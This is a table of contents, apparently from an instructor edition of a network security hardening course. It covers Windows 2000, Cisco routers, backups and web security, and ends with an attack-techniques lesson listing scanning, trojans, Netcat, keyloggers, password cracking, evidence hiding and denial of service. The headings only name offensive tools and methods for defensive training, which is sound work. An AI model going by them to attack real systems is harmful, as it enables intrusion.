Task 4E-1 Enabling Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286Registry Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286

Task 4E-2 Logging SAM Registry Access. . . . . . . . . . . . . . . . . . . . . . . 287Managing the Event Viewer. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288

Task 4E-3 Viewing the Registry Audit . . . . . . . . . . . . . . . . . . . . . . . . 290Event IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291Authentication Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291

Task 4E-4 Creating Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293Viewing Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294

Task 4E-5 Viewing Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294Managing Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295

Topic 4F Windows 2000 EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .296Task 4F-1 Encrypting Files. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298

Topic 4G Windows 2000 Network Security . . . . . . . . . . . . . . . . . . . . . .298Task 4G-1 Investigating Printer Spooler Security . . . . . . . . . . . . . . . . . 299

Communicating without NetBIOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301Task 4G-2 Communication without NetBIOS . . . . . . . . . . . . . . . . . . . . 301

NAT and ICS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303Remote Access. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303RADIUS Implementation in the Classroom . . . . . . . . . . . . . . . . . . . . . . 304

Task 4G-3 Physically Preparing for RADIUS Implementation . . . . . . . . . 304Configuring the Dialup Server. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305

Task 4G-4 Configuring the Dialup Server Configuration. . . . . . . . . . . . . 305Configuring the Dialup Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307

Task 4G-5 Configuring the Dialup Client. . . . . . . . . . . . . . . . . . . . . . . 307

CONTENTS

x Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 12: SCNP Hardening

Creating Users on the RADIUS Server . . . . . . . . . . . . . . . . . . . . . . . . . . 308Task 4G-6 Creating Users on the RADIUS Server . . . . . . . . . . . . . . . . . 308

IAS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309Task 4G-7 Installing IAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309

RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310Task 4G-8 Installing RIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310

Configuring the Dialup Server as a RADIUS Client . . . . . . . . . . . . . . . . 311Task 4G-9 Configuring the Dialup Server as a RADIUS Client . . . . . . . . . 311

Testing the Dialup Client. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312Task 4G-10 Testing the Dialup Client. . . . . . . . . . . . . . . . . . . . . . . . . . 312

Bringing Back the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313Task 4G-11 Reconfiguring the Network . . . . . . . . . . . . . . . . . . . . . . . . 313

Hardening TCP/IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314Task 4G-12 Configuring TCP/IP in the Registry . . . . . . . . . . . . . . . . . . . 315

TCP/IP Filtering. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316Task 4G-13 Configuring Port and Protocol Filtering . . . . . . . . . . . . . . . . 317

Lesson Review 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318

LESSON 5: ROUTERS AND ACCESS CONTROL LISTS

Topic 5A Fundamental Cisco Security. . . . . . . . . . . . . . . . . . . . . . . . . . .322Authentication and Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325Configuring Access Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325

Task 5A-1 Configuring Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . 327Creating User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327Implementing Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327Implementing Cisco Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328

Task 5A-2 Configuring Login Banners . . . . . . . . . . . . . . . . . . . . . . . . 329SSH Overview. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330Router Configuration to use SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330

Task 5A-3 Configuring SSH on a Router . . . . . . . . . . . . . . . . . . . . . . . 332Task 5A-4 Configuring the SSH Client . . . . . . . . . . . . . . . . . . . . . . . . 334

Topic 5B Routing Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334The ARP Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334LAN-to-LAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337LAN-to-WAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338

Task 5B-1 Performing IP and MAC Analysis. . . . . . . . . . . . . . . . . . . . . 339The Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340Static and Dynamic Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 342Comparing Routed Protocols and Routing Protocols . . . . . . . . . . . . . . 345The Routing Protocols. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350

Task 5B-2 Viewing a RIP Capture . . . . . . . . . . . . . . . . . . . . . . . . . . . 351RIPv2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351

Task 5B-3 Viewing a RIPv2 Capture. . . . . . . . . . . . . . . . . . . . . . . . . . 353

CONTENTS

Contents xi

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 13: SCNP Hardening

Topic 5C Removing Protocols and Services . . . . . . . . . . . . . . . . . . . . . .354CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354

Task 5C-1 Turning Off CDP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355

Task 5C-2 Hardening ICMP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356Source Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356Small Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357Finger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357Remaining Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358

Task 5C-3 Removing Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 359

Topic 5D Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . .359Access Control List Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360The Access List Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360The Wildcard Mask. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361

Task 5D-1 Creating Wildcard Masks . . . . . . . . . . . . . . . . . . . . . . . . . . 363

Topic 5E Implementing Access Control Lists . . . . . . . . . . . . . . . . . . . .363Defending Against Attacks with ACLs. . . . . . . . . . . . . . . . . . . . . . . . . . 367

Task 5E-1 Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . 369

Topic 5F Logging Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .369Configuring Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371

Task 5F-1 Configuring Buffered Logging . . . . . . . . . . . . . . . . . . . . . . 373ACL Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374

Task 5F-2 Configuring Anti-spoofing Logging . . . . . . . . . . . . . . . . . . . 376Lesson Review 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377

LESSON 6: CONTINGENCY PLANNING

Topic 6A Continuity and Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . .380Planning for Backups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380Disasters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380Security Policies and Their Impact on the Business. . . . . . . . . . . . . . . 382

Topic 6B Developing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .384Requirements and Goals of a Contingency Plan . . . . . . . . . . . . . . . . . . 384Creating the Contingency Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385Testing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385

Topic 6C The Technologies of Staying On . . . . . . . . . . . . . . . . . . . . . . .387Personal UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387

Task 6C-1 Configuring a UPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388Full Server Rack UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389Building Generators. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389

CONTENTS

xii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 14: SCNP Hardening

Topic 6D Backing Up the Operating Systems. . . . . . . . . . . . . . . . . . . . .391Backup Strategies for Windows Computers. . . . . . . . . . . . . . . . . . . . . . 398

Task 6D-1 Creating a Folder Structure . . . . . . . . . . . . . . . . . . . . . . . . 399Initiating the Backup Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399

Task 6D-2 Initiating a Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . 400Viewing the Results of the Backup Process . . . . . . . . . . . . . . . . . . . . . 400

Task 6D-3 Viewing the State of the Archive Attribute Bit . . . . . . . . . . . 401Restoring a File from Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . . . 401

Task 6D-4 Restoring from a Backup. . . . . . . . . . . . . . . . . . . . . . . . . . 401Understanding Differential Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402

Task 6D-5 Preparing to Start a Differential Backup Sequence . . . . . . . . 402Backing Up Your Weekend’s Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402

Task 6D-6 Initiating a Differential Backup Sequence . . . . . . . . . . . . . . 403Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403

Task 6D-7 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 403Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404

Task 6D-8 Continuing the Differential Backup Sequence . . . . . . . . . . . . 404Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405

Task 6D-9 Adding Data After a Differential Backup . . . . . . . . . . . . . . . 405Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405

Task 6D-10 Differentially Backing Up More Data . . . . . . . . . . . . . . . . . . 405Accidentally Deleting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406

Task 6D-11 Destroying Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 406Restoring Data from a Differential Backup . . . . . . . . . . . . . . . . . . . . . . 406

Task 6D-12 Restoring Files from a Differential Backup . . . . . . . . . . . . . . 407Optional Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408Understanding Incremental Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . 408

Task 6D-13 Preparing to Start an Incremental Backup Sequence . . . . . . . 408Backing up Your Weekend’s Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409

Task 6D-14 Initiating an Incremental Backup Sequence . . . . . . . . . . . . . 409Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409

Task 6D-15 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 410Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410

Task 6D-16 Continuing the Incremental Backup Sequence . . . . . . . . . . . 410Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411

Task 6D-17 Adding Data After an Incremental Backup . . . . . . . . . . . . . . 411Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411

Task 6D-18 Incrementally Backing Up More Data. . . . . . . . . . . . . . . . . . 412Accidentally Corrupting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412

Task 6D-19 Corrupting Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 412Restoring Data from an Incremental Backup . . . . . . . . . . . . . . . . . . . . 413

Task 6D-20 Restoring an Incrementally Backed-up File. . . . . . . . . . . . . . 413Performing an Incomplete Restore from Incremental Backup . . . . . . . 413

Task 6D-21 Incompletely Restoring from Incremental Backup . . . . . . . . . 414Analyzing the Incremental Restore. . . . . . . . . . . . . . . . . . . . . . . . . . . . 415

Task 6D-22 Completely Restoring from Incremental Backup . . . . . . . . . . 415

CONTENTS

Contents xiii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 15: SCNP Hardening

Backup Options for Linux Computers . . . . . . . . . . . . . . . . . . . . . . . . . . 415Task 6D-23 Using the tar Command for Incremental Backups . . . . . . . . . 417

Backup Strategies for Cisco Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . 417Task 6D-24 Backing Up Cisco Router Configurations . . . . . . . . . . . . . . . 418

Lesson Review 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419

LESSON 7: SECURITY ON THE INTERNET AND THE WWWTopic 7A Describing the Components of the Internet . . . . . . . . . . . . .422

The Backbone (or Layer 1 of the Internet). . . . . . . . . . . . . . . . . . . . . . 422Network Service Providers (NSPs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423Long Distance Carriers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423NAPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423ISPs at Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424The Organizations that Help Run the Internet (or Layer 8 of theInternet) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425DNS Revealed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426

Task 7A-1 Defining Internet Components . . . . . . . . . . . . . . . . . . . . . . 428

Topic 7B Identifying the Weak Points of the Internet. . . . . . . . . . . . .428Targeting the Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429Targeting the ISPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430Targeting DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430

Task 7B-1 Identifying Weak Points of the Internet . . . . . . . . . . . . . . . 432DNS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432Configuring DNS for Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . 433

Task 7B-2 Installing a Standard Primary DNS Server on a Windows 2000Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434

Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434Task 7B-3 Creating Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . 435

Forward Lookup Zones. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435Task 7B-4 Creating a Forward Lookup Zone. . . . . . . . . . . . . . . . . . . . . 436

Installing DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436Task 7B-5 Installing DNS Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . 437

Zone Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437Task 7B-6 Creating, Viewing, and Deleting Forward and Reverse Lookup

Zones. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438Standard Secondary DNS Servers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439

Task 7B-7 Creating Secondary Zones . . . . . . . . . . . . . . . . . . . . . . . . . 439Zone Transfers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440

Task 7B-8 Attempting Blocked Zone Transfers . . . . . . . . . . . . . . . . . . . 440

Topic 7C Describing Web Hacking Techniques. . . . . . . . . . . . . . . . . . . .441Vulnerability Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441Incorrect Web Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442Buffer Overflows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443

CONTENTS

xiv Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 16: SCNP Hardening

Task 7C-1 Identifying Web Hacking Techniques . . . . . . . . . . . . . . . . . . 444Web Server Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445

Task 7C-2 Investigating IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . 446Web Site Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446

Task 7C-3 Implementing a Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 446Web Site Maintenance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448

Task 7C-4 Starting and Stopping the Web Server. . . . . . . . . . . . . . . . . 448DoS Problems. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448

Task 7C-5 Controlling Performance Settings . . . . . . . . . . . . . . . . . . . . 449Web Server Directory Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449

Task 7C-6 Controlling the Home Directory Settings . . . . . . . . . . . . . . . 449Web Server Access Controls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449

Task 7C-7 Controlling Access Settings . . . . . . . . . . . . . . . . . . . . . . . . 450Patches and Hot Fixes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451

Task 7C-8 Using the IIS Lockdown Tool . . . . . . . . . . . . . . . . . . . . . . . 452Hot-fix Checker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 452

Task 7C-9 Using the Hot Fix Net Check Tool . . . . . . . . . . . . . . . . . . . . 453Apache. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454

Topic 7D Describing Methods Used to Attack Users . . . . . . . . . . . . . . .455Email Hack Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460DSL and Cable Modem Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . 460

Task 7D-1 Identifying User Vulnerabilities and Internet SecurityConcerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461

Browser Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461General Settings for Internet Explorer 6. . . . . . . . . . . . . . . . . . . . . . . . 462

Task 7D-2 Viewing the General Settings for Your Browser . . . . . . . . . . . 462Advanced Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . 464

Task 7D-3 Viewing the Advanced Settings for Your Browser. . . . . . . . . . 464Security Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . . 466

Task 7D-4 Viewing the Zone Settings for Your Browser . . . . . . . . . . . . . 466Default Security Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467

Task 7D-5 Implementing Default Security Levels for Zones . . . . . . . . . . 467The Low Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468

Task 7D-6 Viewing Detailed Settings for the Security Level Low. . . . . . . 468The High Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469

Task 7D-7 Viewing Detailed Settings for the Security Level High . . . . . . 470The Microsoft Virtual Machine. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471

Task 7D-8 Viewing the Custom Settings for Microsoft VM (Java Settings). 471How to Make Best Use of These Zones . . . . . . . . . . . . . . . . . . . . . . . . . 472

Task 7D-9 Adding Sites to a Zone . . . . . . . . . . . . . . . . . . . . . . . . . . . 472Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473

Task 7D-10 Viewing Cookie Handling Settings. . . . . . . . . . . . . . . . . . . . 473Content Ratings. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473

Task 7D-11 Viewing Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . 474

CONTENTS

Contents xv

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 17: SCNP Hardening

Using Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474Task 7D-12 Configuring a Browser to Use Content Ratings . . . . . . . . . . . 474

Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475Task 7D-13 Properties of the Certificates Section . . . . . . . . . . . . . . . . . 475

Your Personal Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476Task 7D-14 Viewing the Handling of Personal Information by a Browser . . 476

Email Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477Task 7D-15 Basic Security Settings to Take Care of With Your Email Client. 477

Lesson Review 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479

LESSON 8: ATTACK TECHNIQUES

Topic 8A Network Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . .483Who is the Target?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484Studying the Message Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486

Topic 8B Mapping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488Using Traceroute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488

Task 8B-1 Using Windows Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . 489Using traceroute on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489Using Graphical Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489

Task 8B-2 Using VisualRoute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491

Topic 8C Sweeping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492Ping Sweeping. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492Windows Ping Sweepers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493

Task 8C-1 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495

Topic 8D Scanning the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .496Port Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 496The netstat Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497Service Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497

Task 8D-1 Using nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499Windows Port Scanners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499

Task 8D-2 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501Identifying the Operating System and OS Version . . . . . . . . . . . . . . . . 502Using nmap to Identify the OS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505

Task 8D-3 Using nmap to Identify an Operating System . . . . . . . . . . . . 506Using the nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 506

Task 8D-4 Using nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . 507Using Nessus to Perform a Scan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 507

Task 8D-5 Installing Nessus for First-time Use . . . . . . . . . . . . . . . . . . 510Scanning for Vulnerabilities with Nessus . . . . . . . . . . . . . . . . . . . . . . . 510

Task 8D-6 Using Nessus for Vulnerability Scanning . . . . . . . . . . . . . . . 511

Topic 8E Viruses, Worms, and Trojan Horses . . . . . . . . . . . . . . . . . . . . .512Differentiating Between a Virus and a Worm . . . . . . . . . . . . . . . . . . . . 512

CONTENTS

xvi Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 18: SCNP Hardening

The Trojan Horse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513The SubSeven Trojan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513NetBus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 514. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516

Task 8E-1 Using NetBus Pro. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516

Topic 8F Malicious Web Sites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .517Task 8F-1 Implementing a Malicious Web Site . . . . . . . . . . . . . . . . . . 517

Falling Victim to a Malicious Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 518Task 8F-2 Visiting a Malicious Web Site. . . . . . . . . . . . . . . . . . . . . . . 518

Topic 8G Gaining Control Over the System . . . . . . . . . . . . . . . . . . . . . .519Task 8G-1 Using Netcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 519

Topic 8H Recording Keystrokes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .520Task 8H-1 Using Software Keystroke Logging . . . . . . . . . . . . . . . . . . . 521

Hardware Keyloggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521Task 8H-2 Using a Keystroke-logging Keyboard . . . . . . . . . . . . . . . . . . 522

Topic 8I Cracking Encrypted Passwords . . . . . . . . . . . . . . . . . . . . . . . . .523Cracking Passwords with L0pht. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523

Task 8I-1 Using L0pht LC4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526Cracking Passwords with John the Ripper . . . . . . . . . . . . . . . . . . . . . . 527

Task 8I-2 Using John the Ripper . . . . . . . . . . . . . . . . . . . . . . . . . . . 527

Topic 8J Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . . . .529Task 8J-1 Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . 530

Topic 8K Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .531Task 8K-1 Discussing Social Engineering Examples. . . . . . . . . . . . . . . . 532

Topic 8L Case Study: Social Engineering . . . . . . . . . . . . . . . . . . . . . . . .532Task 8L-1 Reviewing the Social Engineering Case Study . . . . . . . . . . . . 535

Topic 8M Gaining Unauthorized Access . . . . . . . . . . . . . . . . . . . . . . . . .535GRUB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537

Task 8M-1 Investigating the Single User GRUB Loader . . . . . . . . . . . . . 537

Topic 8N Hiding Evidence of an Attack . . . . . . . . . . . . . . . . . . . . . . . . .538

Topic 8O Performing a Denial of Service . . . . . . . . . . . . . . . . . . . . . . . .538Task 8O-1 Flooding with Udpflood . . . . . . . . . . . . . . . . . . . . . . . . . . 539

OOB Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 539Lesson Review 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540

CONTENTS

Contents xvii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 19: SCNP Hardening

Glossary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .549

Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567

CONTENTS

xviii Hardening The Infrastructure (SCP)

